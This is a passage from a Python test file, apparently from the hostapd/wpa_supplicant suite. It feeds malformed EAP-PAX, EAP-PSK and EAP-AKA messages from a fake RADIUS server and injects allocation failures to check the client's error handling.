if ctx['num'] == idx:
logger.info("Test: Correct ICV - CE flag in STD-1")
ctx['id'] = 10
return struct.pack(">BBHBBBBBB16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, EAP_PAX_FLAGS_CE,
EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0x9c, 0x98, 0xb4, 0x0b, 0x94, 0x90, 0xde, 0x88,
0xb7, 0x72, 0x63, 0x44, 0x1d, 0xe3, 0x7c, 0x5c)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Correct ICV - too short STD-1 payload")
ctx['id'] = 10
return struct.pack(">BBHBBBBBB16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0xda, 0xab, 0x2c, 0xe7, 0x84, 0x41, 0xb5, 0x5c,
0xee, 0xcf, 0x62, 0x03, 0xc5, 0x69, 0xcb, 0xf4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Correct ICV - incorrect A length in STD-1")
ctx['id'] = 10
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0, 0, 0, 0, 0, 0, 0, 0, 0,
0xc4, 0xb0, 0x81, 0xe4, 0x6c, 0x8c, 0x20, 0x23,
0x60, 0x46, 0x89, 0xea, 0x94, 0x60, 0xf3, 0x2a)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Correct ICV - extra data in STD-1")
ctx['id'] = 10
return struct.pack(">BBHBBBBBBH8LB16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 1 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
1,
0x61, 0x49, 0x65, 0x37, 0x21, 0xe8, 0xd8, 0xbf,
0xf3, 0x02, 0x01, 0xe5, 0x42, 0x51, 0xd3, 0x34)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected STD-1")
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0xe5, 0x1d, 0xbf, 0xb8, 0x70, 0x20, 0x5c, 0xba,
0x41, 0xbb, 0x34, 0xda, 0x1a, 0x08, 0xe6, 0x8d)
idx += 1
if ctx['num'] == idx:
return pax_std_1(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: MAC ID changed during session")
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_HMAC_SHA256_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0xee, 0x00, 0xbf, 0xb8, 0x70, 0x20, 0x5c, 0xba,
0x41, 0xbb, 0x34, 0xda, 0x1a, 0x08, 0xe6, 0x8d)
idx += 1
if ctx['num'] == idx:
return pax_std_1(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: DH Group ID changed during session")
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_2048_MODP,
EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0xee, 0x01, 0xbf, 0xb8, 0x70, 0x20, 0x5c, 0xba,
0x41, 0xbb, 0x34, 0xda, 0x1a, 0x08, 0xe6, 0x8d)
idx += 1
if ctx['num'] == idx:
return pax_std_1(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Public Key ID changed during session")
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE,
EAP_PAX_PUBLIC_KEY_RSAES_OAEP,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0xee, 0x02, 0xbf, 0xb8, 0x70, 0x20, 0x5c, 0xba,
0x41, 0xbb, 0x34, 0xda, 0x1a, 0x08, 0xe6, 0x8d)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected STD-3")
ctx['id'] = 10
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_3, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0x47, 0xbb, 0xc0, 0xf9, 0xb9, 0x69, 0xf5, 0xcb,
0x3a, 0xe8, 0xe7, 0xd6, 0x80, 0x28, 0xf2, 0x59)
idx += 1
if ctx['num'] == idx:
return pax_std_1(ctx)
idx += 1
if ctx['num'] == idx:
# TODO: MAC calculation; for now, this gets dropped due to incorrect
# ICV
logger.info("Test: STD-3 with CE flag")
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_3, EAP_PAX_FLAGS_CE,
EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0x8a, 0xc2, 0xf9, 0xf4, 0x8b, 0x75, 0x72, 0xa2,
0x4d, 0xd3, 0x1e, 0x54, 0x77, 0x04, 0x05, 0xe2)
idx += 1
if ctx['num'] & 0x1 == idx & 0x1:
logger.info("Test: Default request")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_PAX)
else:
logger.info("Test: Default EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(pax_handler)
try:
hapd = start_ap(apdev[0])
for i in range(0, 18):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="user",
password_hex="0123456789abcdef0123456789abcdef",
wait_connect=False)
logger.info("Waiting for EAP method to start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.05)
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
logger.info("Too short password")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="user",
password_hex="0123456789abcdef0123456789abcd",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
logger.info("No password")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="user",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
def test_eap_proto_pax_errors(dev, apdev):
"""EAP-PAX local error cases"""
check_eap_capa(dev[0], "PAX")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0], params)
for i in range(1, 3):
with alloc_fail(dev[0], i, "eap_pax_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="pax.user@example.com",
password_hex="0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ "eap_msg_alloc;eap_pax_alloc_resp;eap_pax_process_std_1",
"eap_msg_alloc;eap_pax_alloc_resp;eap_pax_process_std_3",
"eap_pax_getKey",
"eap_pax_get_emsk",
"eap_pax_get_session_id" ]
for func in tests:
with alloc_fail(dev[0], 1, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="pax.user@example.com",
password_hex="0123456789abcdef0123456789abcdef",
erp="1", wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "os_get_random;eap_pax_process_std_1"),
(1, "eap_pax_initial_key_derivation"),
(1, "eap_pax_mac;eap_pax_process_std_3"),
(2, "eap_pax_mac;eap_pax_process_std_3"),
(1, "eap_pax_kdf;eap_pax_getKey"),
(1, "eap_pax_kdf;eap_pax_get_emsk") ]
for count, func in tests:
with fail_test(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="pax.user@example.com",
password_hex="0123456789abcdef0123456789abcdef",
erp="1", wait_connect=False)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
def test_eap_proto_psk(dev, apdev):
"""EAP-PSK protocol tests"""
def psk_handler(ctx, req):
logger.info("psk_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_PSK)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Non-zero T in first message")
return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16,
EAP_TYPE_PSK, 0xc0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid first message")
return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16,
EAP_TYPE_PSK, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short third message")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_PSK)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid first message")
return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16,
EAP_TYPE_PSK, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Incorrect T in third message")
return struct.pack(">BBHBB4L4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16 + 16,
EAP_TYPE_PSK, 0, 0, 0, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid first message")
return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16,
EAP_TYPE_PSK, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing PCHANNEL in third message")
return struct.pack(">BBHBB4L4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16 + 16,
EAP_TYPE_PSK, 0x80, 0, 0, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid first message")
return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16,
EAP_TYPE_PSK, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalic MAC_S in third message")
return struct.pack(">BBHBB4L4L5LB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16 + 16 + 21,
EAP_TYPE_PSK, 0x80, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid first message")
return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16,
EAP_TYPE_PSK, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
return None
srv = start_radius_server(psk_handler)
try:
hapd = start_ap(apdev[0])
for i in range(0, 6):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="user",
password_hex="0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
logger.info("Test: Invalid PSK length")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="user",
password_hex="0123456789abcdef0123456789abcd",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
finally:
stop_radius_server(srv)
def test_eap_proto_psk_errors(dev, apdev):
"""EAP-PSK local error cases"""
check_eap_capa(dev[0], "PSK")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0], params)
for i in range(1, 3):
with alloc_fail(dev[0], i, "eap_psk_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="psk.user@example.com",
password_hex="0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
for i in range(1, 4):
with fail_test(dev[0], i, "eap_psk_key_setup;eap_psk_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="psk.user@example.com",
password_hex="0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "=eap_psk_process_1"),
(2, "=eap_psk_process_1"),
(1, "eap_msg_alloc;eap_psk_process_1"),
(1, "=eap_psk_process_3"),
(2, "=eap_psk_process_3"),
(1, "eap_msg_alloc;eap_psk_process_3"),
(1, "eap_psk_getKey"),
(1, "eap_psk_get_session_id"),
(1, "eap_psk_get_emsk") ]
for count, func in tests:
with alloc_fail(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="psk.user@example.com",
password_hex="0123456789abcdef0123456789abcdef",
erp="1", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL",
note="No allocation failure seen for %d:%s" % (count, func))
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
tests = [ (1, "os_get_random;eap_psk_process_1"),
(1, "omac1_aes_128;eap_psk_process_3"),
(1, "aes_128_eax_decrypt;eap_psk_process_3"),
(2, "aes_128_eax_decrypt;eap_psk_process_3"),
(3, "aes_128_eax_decrypt;eap_psk_process_3"),
(1, "aes_128_eax_encrypt;eap_psk_process_3"),
(2, "aes_128_eax_encrypt;eap_psk_process_3"),
(3, "aes_128_eax_encrypt;eap_psk_process_3"),
(1, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
(2, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
(3, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
(4, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
(5, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
(6, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
(7, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
(8, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
(9, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
(10, "aes_128_encrypt_block;eap_psk_derive_keys;eap_psk_process_3"),
(1, "aes_ctr_encrypt;aes_128_eax_decrypt;eap_psk_process_3"),
(1, "aes_ctr_encrypt;aes_128_eax_encrypt;eap_psk_process_3") ]
for count, func in tests:
with fail_test(dev[0], count, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="psk.user@example.com",
password_hex="0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_FAIL",
note="No failure seen for %d:%s" % (count, func))
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
EAP_SIM_SUBTYPE_START = 10
EAP_SIM_SUBTYPE_CHALLENGE = 11
EAP_SIM_SUBTYPE_NOTIFICATION = 12
EAP_SIM_SUBTYPE_REAUTHENTICATION = 13
EAP_SIM_SUBTYPE_CLIENT_ERROR = 14
EAP_AKA_SUBTYPE_CHALLENGE = 1
EAP_AKA_SUBTYPE_AUTHENTICATION_REJECT = 2
EAP_AKA_SUBTYPE_SYNCHRONIZATION_FAILURE = 4
EAP_AKA_SUBTYPE_IDENTITY = 5
EAP_AKA_SUBTYPE_NOTIFICATION = 12
EAP_AKA_SUBTYPE_REAUTHENTICATION = 13
EAP_AKA_SUBTYPE_CLIENT_ERROR = 14
EAP_SIM_AT_RAND = 1
EAP_SIM_AT_AUTN = 2
EAP_SIM_AT_RES = 3
EAP_SIM_AT_AUTS = 4
EAP_SIM_AT_PADDING = 6
EAP_SIM_AT_NONCE_MT = 7
EAP_SIM_AT_PERMANENT_ID_REQ = 10
EAP_SIM_AT_MAC = 11
EAP_SIM_AT_NOTIFICATION = 12
EAP_SIM_AT_ANY_ID_REQ = 13
EAP_SIM_AT_IDENTITY = 14
EAP_SIM_AT_VERSION_LIST = 15
EAP_SIM_AT_SELECTED_VERSION = 16
EAP_SIM_AT_FULLAUTH_ID_REQ = 17
EAP_SIM_AT_COUNTER = 19
EAP_SIM_AT_COUNTER_TOO_SMALL = 20
EAP_SIM_AT_NONCE_S = 21
EAP_SIM_AT_CLIENT_ERROR_CODE = 22
EAP_SIM_AT_KDF_INPUT = 23
EAP_SIM_AT_KDF = 24
EAP_SIM_AT_IV = 129
EAP_SIM_AT_ENCR_DATA = 130
EAP_SIM_AT_NEXT_PSEUDONYM = 132
EAP_SIM_AT_NEXT_REAUTH_ID = 133
EAP_SIM_AT_CHECKCODE = 134
EAP_SIM_AT_RESULT_IND = 135
EAP_SIM_AT_BIDDING = 136
def test_eap_proto_aka(dev, apdev):
"""EAP-AKA protocol tests"""
def aka_handler(ctx, req):
logger.info("aka_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_AKA)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unknown subtype")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA, 255, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Client Error")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CLIENT_ERROR, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short attribute header")
return struct.pack(">BBHBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 3,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0, 255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated attribute")
return struct.pack(">BBHBBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0, 255,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short attribute data")
return struct.pack(">BBHBBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0, 255,
0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Skippable/non-skippable unrecognzized attribute")
return struct.pack(">BBHBBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 10,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
255, 1, 0, 127, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request without ID type")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID (duplicate)")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request FULLAUTH_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request FULLAUTH_ID (duplicate)")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request FULLAUTH_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request PERMANENT_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_PERMANENT_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request PERMANENT_ID (duplicate)")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_PERMANENT_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with no attributes")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: AKA Challenge with BIDDING")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0,
EAP_SIM_AT_BIDDING, 1, 0x8000)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification with no attributes")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification indicating success, but no MAC")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 32768)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification indicating success, but invalid MAC value")
return struct.pack(">BBHBBHBBHBBH4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4 + 20,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 32768,
EAP_SIM_AT_MAC, 5, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Notification indicating success with zero-key MAC")
return struct.pack(">BBHBBHBBHBBH16B", EAP_CODE_REQUEST,
ctx['id'] - 2,
4 + 1 + 3 + 4 + 20,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_NOTIFICATION, 0,
EAP_SIM_AT_NOTIFICATION, 1, 32768,
EAP_SIM_AT_MAC, 5, 0,
